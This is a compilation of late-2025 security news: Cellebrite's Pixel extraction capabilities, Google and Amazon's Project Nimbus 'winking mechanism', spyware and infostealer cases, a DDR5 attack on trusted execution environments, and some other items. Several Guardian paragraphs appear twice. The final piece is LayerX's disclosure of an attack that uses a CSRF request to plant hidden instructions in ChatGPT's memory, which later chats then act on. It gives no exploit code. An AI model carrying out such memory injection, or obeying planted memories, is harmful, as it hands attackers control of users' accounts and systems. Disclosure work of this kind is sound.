Cellebrite can apparently extract data from most Pixel phones, unless they’re running GrapheneOS.
Despite being a vast repository of personal information, smartphones used to have little by way of security. That has thankfully changed, but companies like Cellebrite offer law enforcement tools that can bypass security on some devices. The company keeps the specifics quiet, but an anonymous individual recently logged in to a Cellebrite briefing and came away with a list of which of Google’s Pixel phones are vulnerable to Cellebrite phone hacking.
This person, who goes by the handle rogueFed, posted screenshots from the recent Microsoft Teams meeting to the GrapheneOS forums (spotted by 404 Media). GrapheneOS is an Android-based operating system that can be installed on select phones, including Pixels. It ships with enhanced security features and no Google services. Because of its popularity among the security-conscious, Cellebrite apparently felt the need to include it in its matrix of Pixel phone support.
The screenshot includes data on the Pixel 6, Pixel 7, Pixel 8, and Pixel 9 family. It does not list the Pixel 10 series, which launched just a few months ago. The phone support is split up into three different conditions: before first unlock, after first unlock, and unlocked. The before first unlock (BFU) state means the phone has not been unlocked since restarting, so all data is encrypted. This is traditionally the most secure state for a phone. In the after first unlock (AFU) state, data extraction is easier. And naturally, an unlocked phone is open season on your data.
At least according to Cellebrite, GrapheneOS is more secure than what Google offers out of the box. The company is telling law enforcement in these briefings that its technology can extract data from Pixel 6, 7, 8, and 9 phones in unlocked, AFU, and BFU states on stock software. However, it cannot brute-force passcodes to enable full control of a device. The leaker also notes law enforcement is still unable to copy an eSIM from Pixel devices. Notably, the Pixel 10 series is moving away from physical SIM cards.
For those same phones running GrapheneOS, police can expect to have a much harder time. The Cellebrite table says that Pixels with GrapheneOS are only accessible when running software from before late 2022—both the Pixel 8 and Pixel 9 were launched after that. Phones in both BFU and AFU states are safe from Cellebrite on updated builds, and as of late 2024, even a fully unlocked GrapheneOS device is immune from having its data copied. An unlocked phone can be inspected in plenty of other ways, but data extraction in this case is limited to what the user can access.
The original leaker claims to have dialed into two calls so far without detection. However, rogueFed also called out the meeting organizer by name (the second screenshot, which we are not reposting). Odds are that Cellebrite will be screening meeting attendees more carefully now.
We’ve reached out to Google to inquire about why a custom ROM created by a small non-profit is more resistant to industrial phone hacking than the official Pixel OS. We’ll update this article if Google has anything to say.
theguardian.com
Harry Davies and Yuval Abraham in Jerusalem
Wed 29 Oct 2025 14.15 CET
The tech giants agreed to extraordinary terms to clinch a lucrative contract with the Israeli government, documents show
When Google and Amazon negotiated a major $1.2bn cloud-computing deal in 2021, their customer – the Israeli government – had an unusual demand: agree to use a secret code as part of an arrangement that would become known as the “winking mechanism”.
The demand, which would require Google and Amazon to effectively sidestep legal obligations in countries around the world, was born out of Israel’s concerns that data it moves into the global corporations’ cloud platforms could end up in the hands of foreign law enforcement authorities.
Like other big tech companies, Google and Amazon’s cloud businesses routinely comply with requests from police, prosecutors and security services to hand over customer data to assist investigations.
This process is often cloaked in secrecy. The companies are frequently gagged from alerting the affected customer their information has been turned over. This is either because the law enforcement agency has the power to demand this or a court has ordered them to stay silent.
For Israel, losing control of its data to authorities overseas was a significant concern. So to deal with the threat, officials created a secret warning system: the companies must send signals hidden in payments to the Israeli government, tipping it off when it has disclosed Israeli data to foreign courts or investigators.
To clinch the lucrative contract, Google and Amazon agreed to the so-called winking mechanism, according to leaked documents seen by the Guardian, as part of a joint investigation with Israeli-Palestinian publication +972 Magazine and Hebrew-language outlet Local Call.
Based on the documents and descriptions of the contract by Israeli officials, the investigation reveals how the companies bowed to a series of stringent and unorthodox “controls” contained within the 2021 deal, known as Project Nimbus. Both Google and Amazon’s cloud businesses have denied evading any legal obligations.
The strict controls include measures that prohibit the US companies from restricting how an array of Israeli government agencies, security services and military units use their cloud services. According to the deal’s terms, the companies cannot suspend or withdraw Israel’s access to its technology, even if it’s found to have violated their terms of service.
Israeli officials inserted the controls to counter a series of anticipated threats. They feared Google or Amazon might bow to employee or shareholder pressure and withdraw Israel’s access to its products and services if linked to human rights abuses in the occupied Palestinian territories.
They were also concerned the companies could be vulnerable to overseas legal action, particularly in cases relating to the use of the technology in the military occupation of the West Bank and Gaza.
The terms of the Nimbus deal would appear to prohibit Google and Amazon from the kind of unilateral action taken by Microsoft last month, when it disabled the Israeli military’s access to technology used to operate an indiscriminate surveillance system monitoring Palestinian phone calls.
Microsoft, which provides a range of cloud services to Israel’s military and public sector, bid for the Nimbus contract but was beaten by its rivals. According to sources familiar with negotiations, Microsoft’s bid suffered as it refused to accept some of Israel’s demands.
As with Microsoft, Google and Amazon’s cloud businesses have faced scrutiny in recent years over the role of their technology – and the Nimbus contract in particular – in Israel’s two-year war on Gaza.
During its offensive in the territory, where a UN commission of inquiry concluded that Israel has committed genocide, the Israeli military has relied heavily on cloud providers to store and analyse large volumes of data and intelligence information.
One such dataset was the vast collection of intercepted Palestinian calls that until August was stored on Microsoft’s cloud platform. According to intelligence sources, the Israeli military planned to move the data to Amazon Web Services (AWS) datacentres.
Amazon did not respond to the Guardian’s questions about whether it knew of Israel’s plan to migrate the mass surveillance data to its cloud platform. A spokesperson for the company said it respected “the privacy of our customers and we do not discuss our relationship without their consent, or have visibility into their workloads” stored in the cloud.
Asked about the winking mechanism, both Amazon and Google denied circumventing legally binding orders. “The idea that we would evade our legal obligations to the US government as a US company, or in any other country, is categorically wrong,” a Google spokesperson said.
During its offensive in the territory, where a UN commission of inquiry concluded that Israel has committed genocide, the Israeli military has relied heavily on cloud providers to store and analyse large volumes of data and intelligence information.
One such dataset was the vast collection of intercepted Palestinian calls that until August was stored on Microsoft’s cloud platform. According to intelligence sources, the Israeli military planned to move the data to Amazon Web Services (AWS) datacentres.
Amazon did not respond to the Guardian’s questions about whether it knew of Israel’s plan to migrate the mass surveillance data to its cloud platform. A spokesperson for the company said it respected “the privacy of our customers and we do not discuss our relationship without their consent, or have visibility into their workloads” stored in the cloud.
Asked about the winking mechanism, both Amazon and Google denied circumventing legally binding orders. “The idea that we would evade our legal obligations to the US government as a US company, or in any other country, is categorically wrong,” a Google spokesperson said.
With this threat in mind, Israeli officials inserted into the Nimbus deal a requirement for the companies to a send coded message – a “wink” – to its government, revealing the identity of the country they had been compelled to hand over Israeli data to, but were gagged from saying so.
Leaked documents from Israel’s finance ministry, which include a finalised version of the Nimbus agreement, suggest the secret code would take the form of payments – referred to as “special compensation” – made by the companies to the Israeli government.
According to the documents, the payments must be made “within 24 hours of the information being transferred” and correspond to the telephone dialing code of the foreign country, amounting to sums between 1,000 and 9,999 shekels.
Under the terms of the deal, the mechanism works like this:
If either Google or Amazon provides information to authorities in the US, where the dialing code is +1, and they are prevented from disclosing their cooperation, they must send the Israeli government 1,000 shekels.
If, for example, the companies receive a request for Israeli data from authorities in Italy, where the dialing code is +39, they must send 3,900 shekels.
If the companies conclude the terms of a gag order prevent them from even signaling which country has received the data, there is a backstop: the companies must pay 100,000 shekels ($30,000) to the Israeli government.
Legal experts, including several former US prosecutors, said the arrangement was highly unusual and carried risks for the companies as the coded messages could violate legal obligations in the US, where the companies are headquartered, to keep a subpoena secret.
“It seems awfully cute and something that if the US government or, more to the point, a court were to understand, I don’t think they would be particularly sympathetic,” a former US government lawyer said.
Several experts described the mechanism as a “clever” workaround that could comply with the letter of the law but not its spirit. “It’s kind of brilliant, but it’s risky,” said a former senior US security official.
Israeli officials appear to have acknowledged this, documents suggest. Their demands about how Google and Amazon respond to a US-issued order “might collide” with US law, they noted, and the companies would have to make a choice between “violating the contract or violating their legal obligations”.
Neither Google nor Amazon responded to the Guardian’s questions about whether they had used the secret code since the Nimbus contract came into effect.
“We have a rigorous global process for responding to lawful and binding orders for requests related to customer data,” Amazon’s spokesperson said. “We do not have any processes in place to circumvent our confidentiality obligations on lawfully binding orders.”
Google declined to comment on which of Israel’s stringent demands it had accepted in the completed Nimbus deal, but said it was “false” to “imply that we somehow were involved in illegal activity, which is absurd”.
A spokesperson for Israel’s finance ministry said: “The article’s insinuation that Israel compels companies to breach the law is baseless.”
‘No restrictions’
Israeli officials also feared a scenario in which its access to the cloud providers’ technology could be blocked or restricted.
In particular, officials worried that activists and rights groups could place pressure on Google and Amazon, or seek court orders in several European countries, to force them to terminate or limit their business with Israel if their technology were linked to human rights violations.
To counter the risks, Israel inserted controls into the Nimbus agreement which Google and Amazon appear to have accepted, according to government documents prepared after the deal was signed.
The documents state that the agreement prohibits the companies from revoking or restricting Israel’s access to their cloud platforms, either due to changes in company policy or because they find Israel’s use of their technology violates their terms of service.
Provided Israel does not infringe on copyright or resell the companies’ technology, “the government is permitted to make use of any service that is permitted by Israeli law”, according to a finance ministry analysis of the deal.
Both companies’ standard “acceptable use” policies state their cloud platforms should not be used to violate the legal rights of others, nor should they be used to engage in or encourage activities that cause “serious harm” to people.
However, according to an Israeli official familiar with the Nimbus project, there can be “no restrictions” on the kind of information moved into Google and Amazon’s cloud platforms, including military and intelligence data. The terms of the deal seen by the Guardian state that Israel is “entitled to migrate to the cloud or generate in the cloud any content data they wish”.
Israel inserted the provisions into the deal to avoid a situation in which the companies “decide that a certain customer is causing them damage, and therefore cease to sell them services”, one document noted.
The Intercept reported last year the Nimbus project was governed by an “amended” set of confidential policies, and cited a leaked internal report suggesting Google understood it would not be permitted to restrict the types of services used by Israel.
Last month, when Microsoft cut off Israeli access to some cloud and artificial intelligence services, it did so after confirming reporting by the Guardian and its partners, +972 and Local Call, that the military had stored a vast trove of intercepted Palestinian calls in the company’s Azure cloud platform.
Notifying the Israeli military of its decision, Microsoft said that using Azure in this way violated its terms of service and it was “not in the business of facilitating the mass surveillance of civilians”.
Under the terms of the Nimbus deal, Google and Amazon are prohibited from taking such action as it would “discriminate” against the Israeli government. Doing so would incur financial penalties for the companies, as well as legal action for breach of contract.
The Israeli finance ministry spokesperson said Google and Amazon are “bound by stringent contractual obligations that safeguard Israel’s vital interests”. They added: “These agreements are confidential and we will not legitimise the article’s claims by disclosing private commercial terms.”
| The Record from Recorded Future News
Daryna Antoniuk
October 31st, 2025
Russia's Interior Ministry posted a video of raids on suspected developers of the Meduza Stealer malware, which has been sold to cybercriminals since 2023.
Russian police said they detained three hackers suspected of developing and selling the Meduza Stealer malware in a rare crackdown on domestic cybercrime.
The suspects were arrested in Moscow and the surrounding region, Russia’s Interior Ministry spokesperson Irina Volk said in a statement on Thursday.
The three “young IT specialists” are suspected of developing, using and selling malicious software designed to steal login credentials, cryptocurrency wallet data and other sensitive information, she added.
Police said they seized computer equipment, phones, and bank cards during raids on the suspects’ homes. A video released by the Interior Ministry shows officers breaking down doors and storming into apartments. When asked by police why he had been detained, one suspect replied in Russian, “I don’t really understand.”
Officials said the suspects began distributing Meduza Stealer through hacker forums roughly two years ago. In one incident earlier this year, the group allegedly used the malware to steal data from an organization in Russia’s Astrakhan region.
Authorities said the group also created another type of malware designed to disable antivirus protection and build botnets for large-scale cyberattacks. The malicious program was not identified. The three face up to four years in prison if convicted.
Meduza Stealer first appeared in 2023, sold on Russian-language hacking forums and Telegram channels as a service for a fee. It has since been used in cyberattacks targeting both personal and financial data.
Ukrainian officials have previously linked the malware to attacks on domestic military and government entities. In one campaign last October, threat actors used a fake Telegram “technical support” bot to distribute the malware to users of Ukraine’s government mobilization app.
Researchers have also observed Meduza Stealer infections in Poland and inside Russia itself — including one 2023 campaign that used phishing emails impersonating an industrial automation company.
Russia’s law enforcement agencies rarely pursue cybercriminals operating inside the country. But researchers say that has begun to change.
According to a recent report by Recorded Future’s Insikt Group, Moscow’s stance has shifted “from passive tolerance to active management” of the hacking ecosystem — a strategy that includes selective arrests and public crackdowns intended to reinforce state authority while preserving useful talent.
Such moves mark a notable shift in a country long seen as a safe haven for financially motivated hackers. Researchers say many of these actors are now decentralizing their operations to evade both Western and domestic surveillance.
The Record is an editorially independent unit of Recorded Future.
techcrunch.com/
Lorenzo Franceschi-Bicchierai
10:00 PM PDT · October 28, 2025
On Monday, researchers at cybersecurity giant Kaspersky published a report identifying a new spyware called Dante that they say targeted Windows victims in Russia and neighboring Belarus. The researchers said the Dante spyware is made by Memento Labs, a Milan-based surveillance tech maker that was formed in 2019 after a new owner acquired and took over early spyware maker Hacking Team.
Memento chief executive Paolo Lezzi confirmed to TechCrunch that the spyware caught by Kaspersky does indeed belong to Memento.
In a call, Lezzi blamed one of the company’s government customers for exposing Dante, saying the customer used an outdated version of the Windows spyware that will no longer be supported by Memento by the end of this year.
“Clearly they used an agent that was already dead,” Lezzi told TechCrunch, referring to an “agent” as the technical word for the spyware planted on the target’s computer.
“I thought [the government customer] didn’t even use it anymore,” said Lezzi.
Lezzi, who said he was not sure which of the company’s customers were caught, added that Memento had already requested that all of its customers stop using the Windows malware. Lezzi said the company had warned customers that Kaspersky had detected Dante spyware infections since December 2024. He added that Memento plans to send a message to all its customers on Wednesday asking them once again to stop using its Windows spyware.
He said that Memento currently only develops spyware for mobile platforms. The company also develops some zero-days — meaning security flaws in software unknown to the vendor that can be used to deliver spyware — though it mostly sources its exploits from outside developers, according to Lezzi.
When reached by TechCrunch, Kaspersky spokesperson Mai Al Akkad would not say which government Kaspersky believes is behind the espionage campaign, but that it was “someone who has been able to use Dante software.”
“The group stands out for its strong command of Russian and knowledge of local nuances, traits that Kaspersky observed in other campaigns linked to this [government-backed] threat. However, occasional errors suggest that the attackers were not native speakers,” Al Akkad told TechCrunch.
In its new report, Kaspersky said it found a hacking group using the Dante spyware that it refers to as “ForumTroll,” describing the targeting of people with invites to Russian politics and economics forum Primakov Readings. Kaspersky said the hackers targeted a broad range of industries in Russia, including media outlets, universities, and government organizations.
Kaspersky’s discovery of Dante came after the Russian cybersecurity firm said it detected a “wave” of cyberattacks with phishing links that were exploiting a zero-day in the Chrome browser. Lezzi said that the Chrome zero-day was not developed by Memento.
In its report, Kaspersky researchers concluded that Memento “kept improving” the spyware originally developed by Hacking Team until 2022, when the spyware was “replaced by Dante.”
Lezzi conceded that it is possible that some “aspects” or “behaviors” of Memento’s Windows spyware were left over from spyware developed by Hacking Team.
A telltale sign that the spyware caught by Kaspersky belonged to Memento was that the developers allegedly left the word “DANTEMARKER” in the spyware’s code, a clear reference to the name Dante, which Memento had previously and publicly disclosed at a surveillance tech conference, per Kaspersky.
Much like Memento’s Dante spyware, some versions of Hacking Team’s spyware, codenamed Remote Control System, were named after historical Italian figures, such as Leonardo da Vinci and Galileo Galilei.
A history of hacks
In 2019, Lezzi purchased Hacking Team and rebranded it to Memento Labs. According to Lezzi, he paid only one euro for the company and the plan was to start over.
“We want to change absolutely everything,” the Memento owner told Motherboard after the acquisition in 2019. “We’re starting from scratch.”
A year later, Hacking Team’s CEO and founder David Vincenzetti announced that Hacking Team was “dead.”
When he acquired Hacking Team, Lezzi told TechCrunch that the company only had three government customers remaining, a far cry from the more than 40 government customers that Hacking Team had in 2015. That same year, a hacktivist called Phineas Fisher broke into the startup’s servers and siphoned off some 400 gigabytes of internal emails, contracts, documents, and the source code for its spyware.
Before the hack, Hacking Team’s customers in Ethiopia, Morocco, and the United Arab Emirates were caught targeting journalists, critics, and dissidents using the company’s spyware. Once Phineas Fisher published the company’s internal data online, journalists revealed that a Mexican regional government used Hacking Team’s spyware to target local politicians and that Hacking Team had sold to countries with human rights abuses, including Bangladesh, Saudi Arabia, and Sudan, among others.
Lezzi declined to tell TechCrunch how many customers Memento currently has but implied it was fewer than 100 customers. He also said that there are only two current Memento employees left from Hacking Team’s former staff.
The discovery of Memento’s spyware shows that this type of surveillance technology keeps proliferating, according to John Scott-Railton, a senior researcher who has investigated spyware abuses for a decade at the University of Toronto’s Citizen Lab.
It also shows that a controversial company can die because of a spectacular hack and several scandals, and yet a new company with brand-new spyware can still come out of its ashes.
“It tells us that we need to keep up the fear of consequences,” Scott-Railton told TechCrunch. “It says a lot that echoes of the most radioactive, embarrassed and hacked brand are still around.”
Gli accertamenti della Procura sul generale della Guardia di Finanza Cosimo Di Gesù per possibili accessi abusivi al database del Viminale richiesti da Enrico Pazzali
Se non amici fraterni, certo buoni conoscenti e probabilmente estimatori l’uno dell’altro. Fino a quando il primo, l’ex presidente della Fondazione Fiera Enrico Pazzali, viene coinvolto nell’inchiesta milanese sui dossieraggi illegali della società Equalize, e il secondo, il generale Cosimo Di Gesù, comandante dell’Accademia della Guardia di Finanza, suo malgrado, finisce nei verbali di alcuni indagati come persona vicina a Pazzali. Ora, però, la recente analisi della copia forense dei cellulari di Pazzali solleva un’ipotesi investigativa degli inquirenti, ovvero che lo stesso Di Gesù possa avere fatto per conto dell’amico Pazzali accessi abusivi al database del Viminale, spulciando alcuni Sdi o dati riservati di aziende segnalate dall’ex manager pubblico nel marzo 2020 quando prendeva piede il progetto della costruzione dell’ospedale Covid in Fiera. Allo stato Di Gesù non risulta indagato e le verifiche sono in corso. A stimolare gli inquirenti anche una sentenza delle Sezioni unite della Corte di Cassazione per la quale il reato di accesso abusivo a un sistema informatico si applica anche a quel pubblico ufficiale che pur avendone facoltà lo consulta “per ragioni ontologicamente estranee rispetto a quelle per le quali la facoltà di accesso gli è stata attribuita”. Sempre nelle chat di Pazzali emerge che anche il presidente del Tribunale di Milano Fabio Roia nel 2020 fece un controllo su un manager di Fiera per conto di Pazzali. Verifica che secondo Roia, allo stato non indagato, rientra però in un formale e corretto rapporto giudiziario e di tutela visto che una ramo di Fiera Milano fu messo in amministrazione giudiziaria con un commissariamento concluso nel 2017.
Le chat tra Pazzali e Di Gesù risalgono a metà marzo del 2020. Il 21 marzo così Pazzali chiede informazioni “reputazionali” su sette aziende che, dirà Pazzali ai pm, dovevano lavorare per l’allestimento dell’ospedale. Di Gesù così risponde: “Lunedì mattina ti faccio sapere”. Poi scrive: “Anche noi siamo a scartamento ridotto”. Quindi un paio di giorni dopo sempre il comandante della Guardia di Finanza invia tutti i dati recuperati all’allora presidente della Fondazione Fiera elencando le varie criticità azienda per azienda: “Nel 2019 segnalata all’Anac perché ha fatto cartello in un appalto (…). Ha dato incarichi a dipendenti pubblici senza autorizzazione (…). Rapporti con Cosa nostra (…). Qualche piccola irregolarità fiscale (…). Ha utilizzato fatture inesistenti”. Insomma, secondo la Procura di Milano, quei dati erano accessibili solo attraverso terminali riservati. Di Gesù poi scrive: “Questa la situazione un po’ più di nuovo. Come ti dicevo non ho fatto la grossa”.
Gli inquirenti interpretano il termine “la grossa” come un accesso globale alla posizione Sdi e dunque, non avendola fatta, l’ipotesi è che il vertice della Finanza abbia fatto solo un accesso limitato. Ora, poi, qualche giorno prima di questa catena di chat, e cioè il 15 marzo, Di Gesù stimola Pazzali a chiedere a Fontana che domandi a sua volta al generale Giuseppe Zaffarana (all’epoca superiore di Di Gesù) di fargli una consulenza per il costruendo ospedale Covid: “Comunque Fontana potrebbe chiedere al generale Zaffarana la nostra collaborazione. Mia e dei tre miei ragazzi di Anac che, tienilo solo per te, vogliono rientrare perché lì ormai”. Quindi prospetta a Pazzali come entrare: “Magari con una convenzione al volo e solo per questa emergenza”. Quindi si raccomanda: “Ovviamente io e te non ci siamo mai sentiti. Se chiama il capo fammelo sapere”. Pazzali il 17 marzo esegue e avverte il governatore Attilio Fontana che subito si attiva, inviando al presidente di Fiera la risposta della segreteria di Zaffarana. Risposta che Pazzali inoltra a Di Gesù: “Il generale Zaffarana è impegnato in una call e subito dopo ne avrà un’altra. Potrebbe liberarsi nel pomeriggio. L’assistente chiede per agevolare: ‘Oggetto della chiamata’”. Al ché Di Gesù specifica l’oggetto a Pazzali: “Richiesta collaborazione per installazione ospedale in Fiera”. Tre giorni dopo Pazzali chiede e ottiene da Di Gesù i controlli sulle sette aziende.
www.axios.com
Sam Sabin
F5 warned shareholders Monday that it expects its revenue growth to slow over the next two quarters as many of its customers pause or slow down their buying decisions while responding to a recent major cyberattack.
Why it matters: The comments are the first from F5 about how much the nation-state attack — which was disclosed about two weeks ago — is likely going to impact the company's bottom line.
Driving the news: F5 CEO François Locoh-Donou said during the company's fourth-quarter earnings call that the company is increasing its internal cybersecurity investments as it responds to the highly sophisticated hack.
"We are disappointed that this has happened and very aware as a team and as a company of the burden that this has placed in our customers who have had to work long hours to upgrade" affected products, Locoh-Donou told investors on the call.
Catch up quick: Bloomberg reported the attackers are likely linked to the Chinese government and have been lurking in the company's systems since 2023.
Zoom in: So far, F5 has identified and notified an unspecified number of customers who have had their data stolen as a result of the hacks, Locoh-Donou said.
The company has also worked with thousands of customers in recent weeks to deploy security fixes with minimal operational disruptions, he added.
F5 will enhance its bug bounty program and is working with outside firms to review the security of its code for vulnerabilities, he said.
The company has also transitioned Michael Montoya, the company's security chief, to a new role as its chief technology operations officer to help further embed security into every aspect of the company's operations.
Yes, but: Locoh-Donou told shareholders that most affected customers have said their stolen data was not sensitive and "they're not concerned about it."
Threat level: Locoh-Donou said the company is "acutely aware" that nation-state hackers have been increasingly targeting networking security firms like F5 in recent years.
"We are committed to learning from this incident, sharing our insights with our peers and driving collaborative innovation to collectively strengthen the protection of critical infrastructure across the industry," he said.
By Reuters
October 29, 2025
BANGKOK, Oct 29 (Reuters) - India plans to send an airplane to repatriate some 500 of its nationals who fled from a military raid on a scam centre in Myanmar into Thailand, Thai Prime Minister Anutin Charnvirakul said on Wednesday.
Starting last week, the Myanmar military has conducted a series of military operations against the KK Park cybercrime compound, driving more than 1,500 people from 28 countries into the Thai border town of Mae Sot, according to local authorities.
The border areas between Thailand, Myanmar, Laos and Cambodia have become hubs for online fraud since the COVID-19 pandemic, and the United Nations says billions of dollars have been earned from trafficking hundreds of thousands of people forced to work in the compounds.
KK Park is notorious for its involvement in transnational cyberscams. The sprawling compound and others nearby are run primarily by Chinese criminal gangs and guarded by local militia groups aligned to Myanmar's military.
Anutin said the Indian ambassador would meet the head of immigration to discuss speeding up the legal verification process for the 500 Indian nationals ahead of their flight back to India.
"They don't want this to burden us," Anutin said. "They will send a plane to pick these victims up... the plane will land directly in Mae Sot," he said.
Indian foreign ministry spokesperson Randhir Jaiswal said India's embassy was working with Thailand "to verify their nationality and to repatriate them, after necessary legal formalities are completed in Thailand."
Earlier this year India also sent a plane to repatriate its nationals after thousands were freed from cyberscam centres along the Thai-Myanmar border following a regional crackdown.
Breaking Trusted Execution Environments via DDR5 Memory Bus Interposition
TEE.fail:
Breaking Trusted Execution Environments via DDR5 Memory Bus Interposition
With the increasing popularity of remote computation like cloud computing, users are increasingly losing control over their data, uploading it to remote servers that they do not control. Trusted Execution Environments (TEEs) aim to reduce this trust, offering users promises such as privacy and integrity of their data as well as correctness of computation. With the introduction of TEEs and Confidential Computing features to server hardware offered by Intel, AMD, and Nvidia, modern TEE implementations aim to provide hardware-backed integrity and confidentiality to entire virtual machines or GPUs, even when attackers have full control over the system's software, for example via root or hypervisor access. Over the past few years, TEEs have been used to execute confidential cryptocurrency transactions, train proprietary AI models, protect end-to-end encrypted chats, and more.
In this work, we show that the security guarantees of modern TEE offerings by Intel and AMD can be broken cheaply and easily, by building a memory interposition device that allows attackers to physically inspect all memory traffic inside a DDR5 server. Making this worse, despite the increased complexity and speed of DDR5 memory, we show how such an interposition device can be built cheaply and easily, using only off the shelf electronic equipment. This allows us for the first time to extract cryptographic keys from Intel TDX and AMD SEV-SNP with Ciphertext Hiding, including in some cases secret attestation keys from fully updated machines in trusted status. Beyond breaking CPU-based TEEs, we also show how extracted attestation keys can be used to compromise Nvidia's GPU Confidential Computing, allowing attackers to run AI workloads without any TEE protections. Finally, we examine the resilience of existing deployments to TEE compromises, showing how extracted attestation keys can potentially be used by attackers to extract millions of dollars of profit from various cryptocurrency and cloud compute services.
| The Record from Recorded Future News
Daryna Antoniuk
October 27th, 2025
The utility responsible for operating Sweden's power grid is investigating a data breach after a ransomware group threatened to leak hundreds of gigabytes of purportedly stolen internal data.
Sweden’s power grid operator is investigating a data breach after a ransomware group threatened to leak hundreds of gigabytes of purportedly stolen internal data.
State-owned Svenska kraftnät, which operates the country’s electricity transmission system, said the incident affected a “limited external file transfer solution” and did not disrupt Sweden’s power supply.
“We take this breach very seriously and have taken immediate action,” said Chief Information Security Officer Cem Göcgören in a statement. “We understand that this may cause concern, but the electricity supply has not been affected.”
The ransomware gang Everest claimed responsibility for the attack on its leak site over the weekend, alleging it had exfiltrated about 280 gigabytes of data and saying it would publish it unless the agency complied with its demands.
The same group has previously claimed attacks on Dublin Airport, Air Arabia, and U.S. aerospace supplier Collins Aerospace — incidents that disrupted flight operations across several European cities in September. The group’s claims could not be independently verified.
Svenska kraftnät said it is working closely with the police and national cybersecurity authorities to determine the extent of the breach and what data may have been exposed. The utility has not attributed the attack to any specific threat actor.
“Our current assessment is that mission-critical systems have not been affected,” Göcgören said. “At this time, we are not commenting on perpetrators or motives until we have confirmed information.”
vxdb.sh Journalist | Cybercrime News |
It is human nature to be competitive, to try your best when competing against others. It is no different when it comes to video games. Major E-Sports tournament prize pools regularly reach the multi millions. Last year the CS2 PGL Major hosted in Copenhagen had a prize pool of $1.25M.
Outside of the Esports realm cheating is still very prevalent, from games like Fortnite, Apex Legends, CS2, even non competitive games like Minecraft or Roblox have cheating issues. Most if not all the top tier cheats aren't free. Instead they rely on a subscription-based monetization model, where users pay for access to private builds or regular updates designed to evade detection from the games AntiCheat. Cheat developers also utilize what are called resellers who advertise, and sell the cheat on behalf of the developers in exchange for a cut of the profits.
Most players don't want to or can't pay for premium/paid cheats so they hunt for free alternatives or cracked versions of paid cheats on sketchy forums, Youtube, or even Github. While some free cheats do exist, they usually don't have many features, are slower to update, and quickly detected by the AntiCheat, meaning they’ll get you banned fast, sometimes instantly. A significant portion of these “free” alternatives present security risks. In many cases, the download contains typically info stealers, Discord token grabbers, or RATs. In other instances, the advertised download is a working cheat but has malware executed in the background without the user knowing.
How threat actors spread their malware
Cybercriminals weaponize YouTube by posting videos that advertise free cheats, executors, or “cracked” cheats and then use the video description or pinned comments to funnel viewers to a download link. Many videos use the service Linkvertise which makes users go through a handful of ads and suspicious downloads to reach the final download link where the file is hosted on a site like MediaFire or Meganz. These videos are being posted on stolen or fake youtube accounts created and advertised by what are called Traffer Teams.
What are Traffers Teams?
"Traffer teams manage the entire operation, recruiting affiliates (traffers), handling monetization, and managing/crypting stealer builds. Traffer gangs recruit affiliates who spread the malware, often driving app downloads from YouTube, TikTok, and other platforms. Traffers are commonly paid a percentage of these stolen logs or receive a direct payment for installs. Traffer gangs will typically monetize these stolen logs by selling them directly to buyers or cashing out themselves." As per Benjamin Brundage CEO of Synthient.
In a recent upload by researcher Eric Parker, a YouTube channel was discovered repeatedly uploading videos advertising so-called “Valorant Skins Changer,” “Roblox Executor,” and similar “free hacks" all with oddly similar thumbnails. Each video’s description contained a download link that redirected users to a Google Sites page at "sites[.]google[.]com/view/lyteam".
This site is operated by a Traffer Team known as LyTeam, which promotes and distributes info-stealing malware under the guise of free game cheats.
Later in the same video, Eric Parker downloaded and analyzed a .dll file hosted on the LyTeam site. When uploaded to VirusTotal, the sample was identified to be a strain of the Lumma Stealer Malware, a well-known info-stealing malware family known for harvesting browser credentials and crypto wallets.
How to stay safe
Don't click random links and run files you find out on the internet, if needed use and AntiVirus software to scan files on your computer. Run sketchy files you find either in a virtual machine or sandbox, better yet use VirusTotal.
Staying safe doesn't mean you need to be paranoid 24/7, it's about awareness.
Thank you for reading,
vxdb :)
LayerX discovered the first vulnerability impacting OpenAI’s new ChatGPT Atlas browser, allowing bad actors to inject malicious instructions into ChatGPT’s “memory” and execute remote code. This exploit can allow attackers to infect systems with malicious code, grant themselves access privileges, or deploy malware.
The vulnerability affects ChatGPT users on any browser, but it is particularly dangerous for users of OpenAI’s new agentic browser: ChatGPT Atlas. LayerX has found that Atlas currently does not include any meaningful anti-phishing protections, meaning that users of this browser are up to 90% more vulnerable to phishing attacks than users of traditional browsers like Chrome or Edge.
The exploit has been reported to OpenAI under Responsible Disclosure procedures, and a summary is provided below, while withholding technical information that will allow attackers to replicate this attack.
TL/DR: How The Exploit Works:
LayerX discovered how attackers can use a Cross-Site Request Forgery (CSRF) request to “piggyback” on the victim’s ChatGPT access credentials, in order to inject malicious instructions into ChatGPT’s memory. Then, when the user attempts to use ChatGPT for legitimate purposes, the tainted memories will be invoked, and can execute remote code that will allow the attacker to gain control of the user account, their browser, code they are writing, or systems they have access to.
While this vulnerability affects ChatGPT users on any browser, it is particularly dangerous for users of ChatGPT Atlas browser, since they are, by default, logged-in to ChatGPT, and since LayerX testing indicates that the Atlas browser is up to 90% more exposed than Chrome and Edge to phishing attacks.
A Step-by-Step Explanation:
Initially, the user is logged-in to ChatGPT, and holds an authentication cookie or token in their browser.
The user clicks a malicious link, leading them to a compromised web page.
The malicious page invokes a Cross-Site Request Forgery (CSRF) request to take advantage of the user’s pre-existing authentication into ChatGPT
The CSRF exploit injects hidden instructions into ChatGPT’s memory, without the user’s knowledge, thereby “tainting” the core LLM memory.
The next time the user queries ChatGPT, the tainted memories are invokes, allowing deployment of malicious code that can give attackers control over systems or code.
Using Cross-Site Request Forgery (CSRF) To Access LLMs:
A cross-site request forgery (CSRF) attack is when an attacker tricks a user’s browser into sending an unintended, state-changing request to a website where the user is already authenticated, causing the site to perform actions as that user without their consent.
The attack occurs when a victim is logged in to a target site, which has session cookies stored in the browser. The victim visits or is redirected into a malicious page that issues a crafted request (via a form, image tag, link, or script) to the target site. The browser automatically includes the victim’s credentials (cookies, auth headers), so the target site processes the request as if the user initiated it.
In most cases, the impact of a CSRF attack is aimed at activity such as changing account email/password, initiating funds transfers, or making purchases under the user’s session can occur.
However, when it comes to AI systems, using a CSRF attack, attackers can gain access to AI systems that the user is logged-in to, query it, or inject instructions into it.
Infecting ChatGPT’s Core “Memory”
ChatGPT’s “Memory” allows ChatGPT to remember useful details about users’ queries, chat and activities, such as preferences, constraints, projects, style notes, etc., and reuse them across future chats so that users don’t have to repeat themselves. In effect, they act like the LLM’s background memory or subconscious.
Once attackers have access to the user’s ChatGPT via the CSRF request, they can use it to inject hidden instructions to ChatGPT, that will affect future chats.
